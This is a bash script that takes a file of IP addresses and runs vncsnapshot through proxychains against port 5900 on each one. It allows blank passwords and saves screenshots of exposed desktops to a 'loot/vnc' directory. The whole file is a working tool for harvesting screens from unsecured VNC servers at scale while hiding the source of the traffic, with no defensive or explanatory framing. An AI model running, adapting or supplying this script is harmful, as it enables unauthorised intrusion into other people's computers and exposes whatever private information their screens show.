#!/bin/bash

[ $# -eq 0 ] && { echo "Usage: $0 file_containing_ips"; exit 1; }

if [ -z "$1" ]; then
    echo "File not set!"
    exit
fi
if [ ! -f $1 ]; then
    echo "File not found!"
    exit
fi


count=1
while read p; do
  ip=$(echo $p | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}')
  foo="timeout 10 vncsnapshot -verbose $ip $ip.jpg"
  echo $count
  #sleep 1s
  sleep 0.1s
  timeout 60 proxychains vncsnapshot -allowblank -verbose $ip::5900 loot/vnc/$ip.jpg &>/dev/null &
  #if [ $count -eq 100 ]
  #then
    #break
  #fi
  #break
  count=$((count+1))
done <$1

